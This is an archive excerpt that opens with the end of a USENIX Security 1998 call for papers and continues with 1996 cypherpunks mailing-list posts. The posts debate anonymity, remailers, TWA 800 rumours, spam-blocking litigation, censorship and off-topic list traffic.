evenings.  You are invited to make suggestions to the program committee
via email to <security@usenix.org>.

Papers that have been formally reviewed and accepted will be presented
during the symposium and published in the symposium proceedings,
published by USENIX and provided free to technical session attendees.
Additional copies will be available for purchase from USENIX.

SYMPOSIUM TOPICS

Refereed paper submissions are being solicited in areas including but
not limited to:

        * Adaptive security and system management
        * Analysis of malicious code
        * Applications of cryptographic techniques
        * Attacks against networks/machines
        * Computer misuse and anomaly detection
        * Copyright protection (technical solutions)
        * Cryptographic & other security tools
        * File and file system security
        * Network security
        * New firewall technologies
        * Security in heterogeneous environments
        * Security incident investigation and response
        * Security of Mobile Code
        * User/system authentication
        * World Wide Web security

Note that this symposium is not about new codes, ciphers, nor
cryptanalysis for its own sake.

Papers must represent novel scientific contributions in computer
security with direct relevance to the engineering of secure systems
for the commercial sector.

HOW TO SUBMIT A REFEREED PAPER
(Please read carefully.)

The guidelines for submission are a bit different from previous
years. Authors must submit a mature paper in postscript format.
Any incomplete sections (there shouldn't be many) should be
outlined in enough detail to make it clear that they could be
finished easily. Full papers are encouraged, and should be about
8 to 15 typeset pages. Submissions must be received by
September 9, 1997.

Along with your paper, please submit a separate email message
containing the title, all authors, and their complete contact
information (phone, fax, postal address, email), including an
indication of which author is the contact author.

Authors will be notified of acceptance on October 8, 1997.

All submissions will be judged on originality, relevance, and
correctness. Each accepted submission may be assigned a member
of the program committee to act as its shepherd through the
preparation of  the final paper. The assigned member will act
as a conduit for feedback from the committee to the authors.
Camera-ready final papers are due on December 9, 1997.

If you would like to receive detailed guidelines for submission
and examples of extended abstracts, you may send email to:

        <securityauthors@usenix.org>

or telephone the USENIX Association office at (510) 528-8649.

The Security Symposium, like most conferences and journals,
requires that papers not be submitted simultaneously to another
conference or publication and that submitted papers not be
previously or subsequently published elsewhere. Papers
accompanied by non-disclosure agreement forms are not
acceptable and will be returned to the author(s) unread.
All submissions are held in the highest confidentiality prior
to publication in the Proceedings, both as a matter of policy
and in accord with the U.S. Copyright Act of 1976.

There will be one or two prizes awarded for best paper(s).

WHERE TO SUBMIT

For reliability, please send one copy of your paper to the program
committee via each of two of the following methods. All submissions
will be acknowledged.

  o Preferred Method: email (Postscript) to:
        <securitypapers@usenix.org>

  o Alternate Method: postal delivery to
       Security Symposium
       USENIX
       2560 Ninth St., Ste. #215
       Berkeley CA 94710
       U.S.A.
       Phone: (510) 528-8649

  o Fax:  (510) 548-5738


Vendor Exhibits

Demonstrate your security product to our technically astute attendees
responsible  for security at their sites.  We invite you to take part
in the Vendor Display.  The informal, table-top display allows you to
meet with attendees informally and demonstrate in detail your security
solutions.

Contact CynthiaDeno
Email: cynthia@usenix.org
Phone:  408.335.9445
Fax 408.335.5327


Works-in-Progress Session (WIPs)

The last session of the symposium will be a Works-in-Progress session
consisting of five minute presentations. Speakers should provide a one
or two paragraph abstract to the program chair by 6:00 pm on January
28, 1998 at the conference. These should be provided in person, not via
email. The chair will post the schedule of presentations by noon on the
29th. Experience at other conferences has shown that usually, all of
them are accepted.  The five minute time limit will be strictly enforced.

INVITED TALKS

There will be several invited talks at the conference in parallel with
the refereed papers. If you have suggestions for possible speakers,
please send them to <security@usenix.org>.

REGISTRATION MATERIALS

Materials containing all details of the technical and tutorial
programs, registration fees and forms, and hotel information will be
available at the end of October 1997.  To receive the registration
materials, please contact:

USENIX Conference Office
22672 Lambert Street, Suite 613
Lake Forest, CA USA   92630
Phone:  (714) 588-8649
Fax: (714) 588-9706
Email: <conference@usenix.org>

Information can also be found under the Conference home page:
<http://www.usenix.org/sec/sec98.html>.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Mon, 9 Sep 1996 03:09:29 +0800
To: cypherpunks@toad.com
Subject: Re: What the NSA is patenting
Message-ID: <842190632.29813.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



 >The NSA STM method is related to reading _very subtle_ variations in
 >magnetic domain modifications. Jitter in read-write head positions can be
 >thought of as a noise (N) added to some signal (S)l.

> Extraction of signals
 >in low S/N ration environments is a well-developed science.

As anyone who has ever subscribed to alt.sex will know ;-)


  Datacomms Technologies web authoring and data security
     Paul Bradley, Paul@fatmans.demon.co.uk
       Http://www.fatmans.demon.co.uk/crypt/
         "Don`t forget to mount a scratch monkey"

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6

mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53
6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3
sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR
tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az4=
=riHc
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: edyson@edventure.com (Esther Dyson)
Date: Mon, 9 Sep 1996 00:22:21 +0800
To: Chuck Thompson <chuck@nova1.net>
Subject: Re: The Esther Dyson Flap
Message-ID: <19960908135750483.AAO156@Esther>
MIME-Version: 1.0
Content-Type: text/plain


FWIW, I'm still collecting some thoughts, because this is a complex topic
(as you all know), and I'm tired of having my views misinterpreted and
misattributed.  So I want to state them clearly and carefully.  This is
simply a reaction to one item. 


 At 09:12 PM 9/4/96 -0500, Chuck Thompson wrote:
>>Date: Tue, 3 Sep 1996 14:23:40 -0700
>>X-Sender: tcmay@mail.got.net
>>To: cypherpunks@toad.com
>>From: tcmay@got.net (Timothy C. May)
>>Subject: Re: The Esther Dyson Flap
>>Sender: owner-cypherpunks@toad.com
>>
......................

Please note the quote marks carefully.  I said [something like] the first
paragraph, but the rest is the "reporter" from Scientology, plus a paraphrase.

>>
>>By the way, the Scientologists have also noted her views:
>>
>>"Esther Dyson, member of the board of directors of the Electronic Frontier
>>Foundation and member of the National Information Infrastructure Advisory
>>Council, spoke on the anonymity issue at the fifth Computers, Freedom &
>>Privacy (CFP) conference in San Francisco. "I have a concern about the
>>spread of bad behavior on the Net," said Dyson. "Anonymity figures into
>>this, and I feel that it has proven to not be a positive factor. It breaks
>>down
>>the community which we are seeking to build, and could turn the 'big
>>cities' of the information infrastructure into a big cesspool."
>>
>>"Remailers who facilitate anonymous postings are part of the problem. They
>>can act as conduits for those who seek anonymity as a way to act illegally
>>without getting caught; yet remailers are able to shield themselves from
>>responsibility or liability.
>>
>>"Computer experts stress that anonymous users should at least be trackable
>>by the remailers -- and that ones who act unlawfully can easily put the
>>remailers at risk. Dyson noted that in self-regulatory schemes for almost
>>any part of the Internet, "visibility, not anonymity, would have a strong
>>place.""
>>
>>(end quote, from "Freedom," at http://www.theta.com/goodman/hijack.htm)
>>
>

Esther Dyson				Always make new mistakes!
EDventure Holdings
<edyson@edventure.com> 
1 (212) 924-8800
1 (212) 924-0240 fax
104 Fifth Avenue
New York, NY 10011 USA 
www.edventure.com
High-Tech Forum in Lisbon, October 27-29, 1996
PC Forum in Tucson, Arizona, March 23-26, 1997





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Enzo Michelangeli <enzo@ima.com>
Date: Sun, 8 Sep 1996 12:40:15 +0800
To: Hallam-Baker <hallam@ai.mit.edu>
Subject: Re: Los Angeles Times article on Helsingius and anon.penet.fi
In-Reply-To: <3231FB72.167E@ai.mit.edu>
Message-ID: <Pine.WNT.3.94.960908100847.-490199B-100000@enzohome.ima.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 7 Sep 1996, Hallam-Baker wrote:

> There is a massive difference between anonymous speech and anonymous
> transactions. Anonymous speech can create problems (defamation etc.)
> but in the main these are not problems the courts are particularly
> good at dealing with.

Perhaps, but defamation is an issue that can't be ignored either,
especially if one tries to build systems based on reputation.

Enzo





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Mon, 9 Sep 1996 00:44:45 +0800
To: cypherpunks@toad.com
Subject: [NOISE] More From Rumor-central
Message-ID: <199609081422.KAA36716@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

[This has nothing to do with cryptography, but it is
related to other posts seen here recently.]

Miami Herald reports today on page 3A that the National
Transportation Safety Bureaucrats are "investigating an
American Airlines pilot's report that a missile zoomed
by his 757 on Aug. 29 as it flew near NASA and Navy
facilities in Virginia on its way to Boston."

An NTSB spokesman has confirmed an investigation (termed
a 'preliminary probe') is ongoing. Not to be outdone,
the FAA is investigating as well. All this is according
to the Herald, and I offer no opinions about veracity or
trustworthiness of this particular media organ or what
caused the crash of flight 800.
JMR

Regards, Jim Ray -- DNRC Minister of Encryption Advocacy

 Thursday, September 5 is the day when, in 1698, Russian Czar
 Peter the Great imposed a tax on...beards. Please, don't tell
 Congress. [Source: The Advocates for Self-Government.]  

"As govt.s grow arithmetically, corruption grows exponentially."
 -- Ray's Law of official corruption.

 Defeat the Duopoly!             Stop the Browne out.
 Harry Browne for President. Jo Jorgensen for Vice-president.
 http://www.HarryBrowne96.org/   http://www.twr.com/stbo
___________________________________________________________________
PGP id.E9BD6D35 51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8
<mailto:liberty@gate.net> http://www.shopmiami.com/prs/jimray
___________________________________________________________________

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMjLU4m1lp8bpvW01AQHB3AP/ROTTRCtg4LBrDwVSml2isdcm2GmFd01I
63dQg3o+ixBFldjXC3oHkQDUWSTyrpj/QXvUy43EGIdJMQ8MRI1+NCIu2R1ikF63
LasufEIvbCIzTcX1s+/n6vxciU6CYj2e5akbw4qBIK+eOr2roOoFADAKyQQbDdxx
JvOvUzMVj/M=
=WQHz
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 9 Sep 1996 11:46:01 +0800
To: Declan McCullagh <cypherpunks@toad.com
Subject: Re: Cypherpunks subscribers - Singapore and NZ gvts, plus IRS
Message-ID: <ae58bcf20b0210047d43@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:56 PM 9/8/96, Declan McCullagh wrote:
>I suppose it would be only polite to ask the Singapore government folks
>and IRS employees to join our conversation.
>
>The cypherpunks list now has nearly 1,400 direct subscribers, plus
>whoever reads it through local mail-news gateways.
>
>(Note I'm not indicating that a .gov.sg or .irs.gov address implies
>anything about an individual's personal political beliefs.)

>
>video@nhmxw0.fnal.gov
>e875836@popcorn.llnl.gov
>foley_p@kosmos.wcc.govt.nz
..

What, so now my group, Government Office of Technology, is no longer
considered part of the military-bureaucratic complex?

-- tcmay@got.net

(And to think I get paid a GS-16 salary just to keep tabs on you folks,
feed you disinformation, and entice you into various operations.)

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 9 Sep 1996 11:53:05 +0800
To: cypherpunks@toad.com
Subject: Re: Imminent Death of the Internet, GIF at 11
Message-ID: <ae58bea00c021004e232@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:40 PM 9/7/96, Martin Minow wrote:

>We certainly are seeing changes in the way we use the network. When
>I "got on the net" in the late 1970's, I was on two mailing lists
>(SF-Lovers and Human Net) and could read *all* of Usenet traffic
>in an hour or two. In the late 1980's, Usenet traffic totalled

The 2002 version, unless our list is outlawed as being part of a TICO
(Terrorist-Influenced and Corrupt Organization) conspiracy:

"I could read *all* of the Cypherpunks traffic in a day or two..."

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Wayne H. Allen" <whallen@capitalnet.com>
Date: Mon, 9 Sep 1996 01:34:13 +0800
To: attila <attila@primenet.com>
Subject: Re: talker
Message-ID: <199609081513.LAA14900@ginger.capitalnet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:03 AM 9/8/96 +0000, attila wrote:

>=Dear Whoever,
>

>        cypherpunks are *not* crackers; this is a crytographic 
>    and political issues relating to cryptography mailing list. 
>
> 


    Well maybe, political issues galore certainly, but very very little
to do with cryptography. I mean what does TWA 800 have to do with this
list. I mean lets be completely honest here, whatever the original 
purpose of the list was for its been allowed to shift away from its
intended purpose considerably.
Wayne H.Allen
whallen@capitalnet.com
Pgp key at www.capitalnet.com/~whallen





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 9 Sep 1996 11:55:18 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] Far-reaching tentacles . . . ?
Message-ID: <ae58bfd30d0210042a69@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:38 PM 9/8/96, Alan Bostick wrote:
>Found in the news:
>
>
>        (SACRAMENTO)- The principals of six Sacramento area schools have
>received 46 used computers that were renovated by inmates at Folsom
>Prison. Warden Theo White delivered the machines after they were given a
>reprieve from the scrap heap. The prison obtained the donated personal
>computers from the non-profit Detwiler Foundation... which began working
                               ^^^^^^^^^^^^^^^^^^^
>five years ago to bring new technology into the state's classrooms.
>
>[Would you want *YOUR* CHILDREN to use computers that had been HACKED
>by CONVICTED CRIMINALS????]

Who cares about the convicted criminals? It's the connection to the
Detwiler Foundation that would worry me.

(Now that's what you call an S. Boxx!)

--Medusa







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 9 Sep 1996 13:43:17 +0800
To: cypherpunks@toad.com
Subject: "Intended Purpose" of the Cypherpunks List
Message-ID: <ae58c1c10e0210049e6f@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:09 PM 9/8/96, Wayne H. Allen wrote:

>    Well maybe, political issues galore certainly, but very very little
>to do with cryptography. I mean what does TWA 800 have to do with this
>list. I mean lets be completely honest here, whatever the original
>purpose of the list was for its been allowed to shift away from its
>intended purpose considerably.

I'm curious. You say the list has "been allowed to shift away from its
intended purpose considerably."

First, who "allowed" it. (We should perhaps track down those who allowed
this and rap them upside the head.)

Second, and more importantly, just what was its "intended purpose"?

While I delete immediately fantasies about how the Bilderbergers ordered
TWA 800 shot down with Russian Strelas as a warning for Bill Clinton, the
other discussions related to TWA 800, e.g., mandatory person-number I.D. to
board planes, increased inspections, national data bases of "suspicious
persons," etc., are very much on-topic for this list.

But, then, what would I know?

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jfricker@vertexgroup.com (John F. Fricker)
Date: Mon, 9 Sep 1996 05:04:56 +0800
To: cypherpunks@toad.com
Subject: Re: PRESS RELEASE: GERMANY CENSORS DUTCH WEBSITE WWW.XS4ALL.NL
Message-ID: <2.2.32.19960908184651.00ac63d4@vertexgroup.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:24 AM 9/6/96 -0700, you wrote:
>
>* wouldn't it be deliciously ironic if the "Free Speech Blue Ribbon" now
>attached to so many pages were to be joined by a "Star of David"? This Star
>of David symbol could mean "We support freedom to read, and our site
>contains the "Radikal" publication which Germans are forbidden to access."
>

Well I think the Star of David has so many meanings that the message may get
muddled. Seems like busy sites can support the mirror of their choice by
putting a note such as "This is a Radikal site". The "mispelling" is the medium.

>(I know nothing of how such symbolic campaigns are actually launched and
>managed, so I'm suggesting the hint of an idea. I do think mirroring the
>banned publication (_any_ banned publication, by _any_ government) on as
>many sites as possible is a Good Idea.)
>

Tell two people. Put up a mirror. Add a link on a busy page. Did I miss
anything?

--j
http://206.101.74.42 is a Radikal site





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blake Wehlage <jwilk@iglou.com>
Date: Mon, 9 Sep 1996 02:16:10 +0800
To: cypherpunks@toad.com
Subject: FW: Re: talker
Message-ID: <m0uzm75-000bRjC@relay.iglou.com>
MIME-Version: 1.0
Content-Type: text/plain


>Return-Path: <doom13@juno.com>
>To: jwilk@iglou.com
>Subject: Re: talker
>References: <m0uzcEf-000bPKC@relay.iglou.com>
>X-Juno-Line-Breaks: 1-5
>From: doom13@juno.com (Floyd W Odom)
>Date: Sun, 08 Sep 1996 10:56:43 EDT

Check this out guys & gals

>
>Hey Blake cyphering sucks. You want to live on the like us? I went to
>jail for jackin the westroads. And I still got away wit some shit.
>
>
>
>Doom13
>
>
==========================================
   Blake Wehlage <jwilk@iglou.com>
   ‡±" RëVðLû¡ØÑ Bø+ (c)ÖmP@ñ¥ (tm) "±‡
 Goto: http://members.iglou.com/jwilk





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Roger Williams <roger@coelacanth.com>
Date: Mon, 9 Sep 1996 02:51:15 +0800
To: "Chris Adams" <adamsc@io-online.com>
Subject: Re: talker
In-Reply-To: <19960908045041953.AAA106@IO-ONLINE.COM>
Message-ID: <roger91akrk90.fsf@sturgeon.coelacanth.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Chris" == Adamsc  <Adamsc@io-online.com> writes:

  > Hmmmm... Want to bet our other friend at juno.com sent him?  I
  > might just end up killfiling juno.com...  Obviously a low-IQ area
  > of the net.

Yup -- you're never going to see a very high SNR out of Juno:

  "Juno is completely free: no monthly charges, no hourly charges, no
   per-message charges, no sign-up fees, and no subscription fees.
   You don't have to pay for the software..."

  "Instead of charging its members, Juno will rely on revenues derived
   largely from selectively targeted advertising..."

Unfortunately, this policy also means that bogon-rich Junons can't
abuse Usenet for free, so they're spending their time party-crashing
mailing lists...

-- 
Roger Williams                         finger me for my PGP public key
Coelacanth Engineering        consulting & turnkey product development
Middleborough, MA           wireless * DSP-based instrumentation * ATE
tel +1 508 947-8049 * fax +1 508 947-9118 * http://www.coelacanth.com/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Mon, 9 Sep 1996 06:12:07 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: TWA 800 - Friendly Fire?
In-Reply-To: <Pine.SUN.3.94.960908014110.15194D-100000@polaris>
Message-ID: <Pine.SUN.3.91.960908122940.821I-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


Got a note from Brock on the original TWA 800 posting from "MacDonald" --

> I can't believe anyone would stand for this kind of shit.  Total, 
> absolute garbage.  And I'll bet anyone $5,000 to prove I'm wrong in 
> calling his "rumor" from a "reliable source" a total myth.

$5,000 ain't chump change. Anyone want to collect?

-Declan


On Sun, 8 Sep 1996, Black Unicorn wrote:

> On Fri, 6 Sep 1996, John Anonymous MacDonald wrote:
> 
> > The latest rumor.
> > 
> > The message came to me from a man who was Safety Chairman for the
> > Airline Pilots Association for many years and he is considered an
> > expert on safety.  He would not ever spread idle rumor.  In short,
> > he is usually quite certain before saying anything!
> 
> Feel free to cite his credentials AFTER you disclose his name.
> 
> :)
> 
> --
> I hate lightning - finger for public key - Vote Monarchist
> unicorn@schloss.li
> 


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Mon, 9 Sep 1996 06:18:06 +0800
To: Will Rodger <rodger@interramp.com>
Subject: Re: Court challenge to AOL junk-mail blocks
In-Reply-To: <1.5.4.32.19960907204437.0068b4d8@pop3.interramp.com>
Message-ID: <Pine.SUN.3.91.960908123138.821J-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


I will of course defer to Will's grasp of the facts, since I haven't been
following this story or interviewing the principals. (Though I have read
the court's opinion and Reid's article in the Philly Inquirer.)

The judge did mention "status quo" in his opinion. I would hope that 
"status quo" would mean the ability of ISPs to offer and enforce whatever 
contracts they want -- including banning incoming spam -- without the 
intervention of the government. Unless, of course, the ISP breaks the 
contract, but in that case the plaintiffs should be the customers, not 
the spammer.

Contrary to what CyberPromo has been telling the press, Internet email is
not the U.S. Postal Service. In fact, the USPS has a rather horrific
monopoly that has given rise to Comstockery in the last century, the
Robert Thomas case more recently, laws giving the USPS the sole right to
insert mail in your mailbox, and las banning private enterprise from
delivering "non-urgent" mail.

That kind of bureaucratic monopolistic foolishness is not what the Net needs.

-Declan



On Sat, 7 Sep 1996, Will Rodger wrote:
> 
> At 12:27 PM 9/7/96 -0700, Declan McCullagh wrote:
> >If AOL wants to stop spammers, let them. They have every right to do so as
> >long as their agreement with their customers permits it. It's a matter of
> >contract law between AOL and its customers and should not involve the
> >spammers and a lawsuit brought by the spammers.
> >
> >It seems as though the judge was snookered by the spammers' claim of U.S. 
> >Mail-like service, free speech, blah. The right to free speech does 
> >extend to corporations; in that way, it includes the right *not* to speak.
> >
> 
> Declan raises a good point. But I'm guessing it's a bit more complex than
> that.  CyberPromo and AOL lawyers tell me the court slapped down AOL simply
> to "keep the status quo." Both sides used those very words, in fact. 
> 
> What's more, CyberPromo talks a good game on the First Amendment, but used
> computer fraud and unfair competition statutes - not the Bill of Rights - in
> its original filing against AOL. So what's going on?
> 
> It seems Weiner is  _very_ aware that this case deals with things never
> before argued in court. No one has really sorted out just how much e-mail -
> if any - an ISP is obligated to carry against its wishes. What Weiner
> decides this fall may not set the kind of precendent that the case of the
> Pentagon Papers did, but will be important for a while at least. 
> 
> Will


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Mon, 9 Sep 1996 06:24:14 +0800
To: cypherpunks@toad.com
Subject: Cypherpunks subscribers - Singapore and NZ gvts, plus IRS
Message-ID: <Pine.SUN.3.91.960908125100.821K-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


I suppose it would be only polite to ask the Singapore government folks 
and IRS employees to join our conversation.

The cypherpunks list now has nearly 1,400 direct subscribers, plus 
whoever reads it through local mail-news gateways.

(Note I'm not indicating that a .gov.sg or .irs.gov address implies 
anything about an individual's personal political beliefs.)

-Declan


// declan@eff.org // I do not represent the EFF // declan@well.com //


video@nhmxw0.fnal.gov
e875836@popcorn.llnl.gov
foley_p@kosmos.wcc.govt.nz
cypherpunks@cheetah.llnl.gov
cypherpunks@citec.qld.gov.au
kwans@nii.ncb.gov.sg
sklim@nii.ncb.gov.sg
cypherpunks-x@nasirc.hq.nasa.gov
rromine@nsf.gov
peter@nii.ncb.gov.sg
kfall@ee.lbl.gov
timb@defcen.gov.au
marty.burkhouse@ccmail.irs.gov
peterb@lanl.gov
cypherpunks-2localnews@mailhost.dpie.gov.au
stevek@telchar.jpl.nasa.gov
il1@ornl.gov
walters@snad.ncsl.nist.gov
bgamble@wo0033wp.wo.blm.gov
"Bruce C. Dovala" <bdovala@solaria.mil.wi.us>
kmigoe@orion.ncsc.mil
kda36@naic.wpafb.af.mil
mengertc@seoul-1sig.korea.army.mil
tut@ncr.disa.mil
holmesb@rl.af.mil
serverb@mqg-smtp3.usmc.mil
sezgin@tsk.mil.tr
halland@hq.hqusareur.army.mil





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephen Cobb <stephen@iu.net>
Date: Mon, 9 Sep 1996 03:08:51 +0800
To: "<pstira@escape.com>
Subject: Re: TWA 800 - Friendly Fire?
Message-ID: <1.5.4.32.19960908170804.006ae62c@iu.net>
MIME-Version: 1.0
Content-Type: text/plain


>
>-Millie
>sfuze@tiac.net
>
>"What we have here is a FAILURE to COMMUNICATE" (some song)
>
Actually some movie, Cool Hand Luke, Paul Newman. The WAV file is around
here somewhere.

s.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Neely <accessnt@ozemail.com.au>
Date: Sun, 8 Sep 1996 13:56:38 +0800
To: "<pstira@escape.com>
Subject: Re: TWA 800 - Friendly Fire?
Message-ID: <2.2.32.19960908041522.006d97d8@ozemail.com.au>
MIME-Version: 1.0
Content-Type: text/plain



>Look at what has been happening in the news lately -- and look at how 
>much is "unexplained" or flimsy evidencially speaking, in the very least.
>If, for instance, the government wanted to cut down on civil 
>liberties/civil rights, it would seem MIGHTY CONVENIENT that so much is 
>"accidentally" happening so close together.

>-Millie
>sfuze@tiac.net

Yes, I wonder if the WhiteHouse will rush through a bill overturning the
anti-terrorist measures which they justified on the basis of the TWA bombing.

Regards,

Mark
___
Mark Neely - accessnt@ozemail.com.au 
Lawyer, Internet Consultant, Professional Cynic
Author: Australian Beginner's Guide to the Internet (2nd Ed.)
	Australian Business Guide to the Internet
	Internet Guide for Teachers, Students & Parents
Check out my Anti-SPAM FAQ: http://www.accessnt.com.au/faqs/spam.htm





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Z.B." <zachb@netcom.com>
Date: Mon, 9 Sep 1996 07:07:14 +0800
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: talker
In-Reply-To: <199609081833.LAA07514@dns2.noc.best.net>
Message-ID: <Pine.3.89.9609081353.A27184-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 7 Sep 1996, James A. Donald wrote:

> At 12:26 PM 9/8/96 -0500, Roger Williams wrote:
> > Yup -- you're never going to see a very high SNR out of Juno:
> 
> Yes, the anarchy list has a persistent moron from Juno.com, educated 
> well above his intelligence.   A seriously proflic loon.
> 
> I have told eudora to transfer everything from juno.com into my
> loon file, regardless of author.  Makes AOL.com look like
> caltech.

I just checked www.juno.com to see what kind of system they have, and it 
appears that it is a free email service.  No charges at all.  No wonder 
we get so many idiots from there - free mail and they probably don't 
bother to verify the people they give service to, either.


---

Zach Babayco

zachb@netcom.com  <----- finger for PGP public key
http://www.geocities.com/SiliconValley/Park/4127








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Byrd <byrd@ACM.ORG>
Date: Mon, 9 Sep 1996 03:47:15 +0800
To: cypherpunks@toad.com
Subject: Re: Church of Scientology
Message-ID: <2.2.16.19960908172415.25478cfe@super.zippo.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:44 AM 9/8/96 -0700, Dale Thorn <dthorn@gte.net> wrote:
>Scuttlebut is, CoS rolled over on some pesky ultra-right-wingers as a 
>favor to Morris Dees and various scumbag associates. For this, CoS got 
>their long-awaited (40-plus years!) federal tax-free status.
>
>This status is big cash, so naturally, interested parties wanted to know 
>under what rules did CoS get their tax-free gift, since long-standing 
>high court decisions laid out the profit-making business plan of CoS in 
>no uncertain terms, explicit and detailed.
>
>Problem is, nobody was able to get the details of the policy change - 
>did CoS change their business plan, or did the fed change their rules?


This is exactly the subject of a lawsuit by Tax Analysts, Inc. against the
IRS. This is still in progress.  The cult is not a party to this suit, so they
can't bring their lawyers into this one.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Davis <eagle@armory.com>
Date: Mon, 9 Sep 1996 07:12:24 +0800
To: cypher punks <cypherpunks@toad.com>
Subject: Denver Physical Cypherpunks Meeting?
Message-ID: <9609081327.aa28086@deepthought.armory.com>
MIME-Version: 1.0
Content-Type: text


Anyone in the front range interested in a physical meeting?  Majordomo's
Net Cafe at 1401 Ogden is a natural.  Let me know.  I'm teaching some
fundamental crypto classes there next month, and it's never a bad idea 
to get our heads together on effecting the passage of Pro Code and SAFE. 
-- 
According to John Perry Barlow:                       *What is EFF?* 
"Jeff Davis is a truly gifted trouble-maker." *email <info@eff.org>*
*** O U T L A W S  On The  E L E C T R O N I C  F R O N T I E R ****
US Out Of Cyberspace!!! Join EFF Today! *email <membership@eff.org>*   




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@cnw.com>
Date: Mon, 9 Sep 1996 07:19:05 +0800
To: "'cypherpunks@toad.com>
Subject: John Locke on True Names
Message-ID: <01BB9D8D.09917DA0@king1-22.cnw.com>
MIME-Version: 1.0
Content-Type: text/plain



9.  But it will be here said that, if _moral knowledge_ be placed in the contemplation of our own _moral ideas_, and those, as other modes, be of our own making, what strange notions will there be of _justice_ and _temperance_?  What confusion of virtues and vices, if everyone may make what _ideas_ of them he pleases?

No confusion or disorder in the things themselves, nor the reasonings about them; no more than (in mathematics) there would be a disturbance in the demonstration, or a change in the properties of figures and their relations one to another, if a man should make a triangle with four corners, or a _trapezium_ with four right angles:  that is in plain _English_, change the names of the figures and call that by one name which mathematicians called ordinarily by another.  For let a man make to himself the _idea_ of a figure with three angles whereof one is a right one, and call it, if he please, _equilaterum_  or  _trapezium_  or anything else, the properties of and demonstrations about that _idea_ will be the same as if he called it a _rectangular-triangle_.

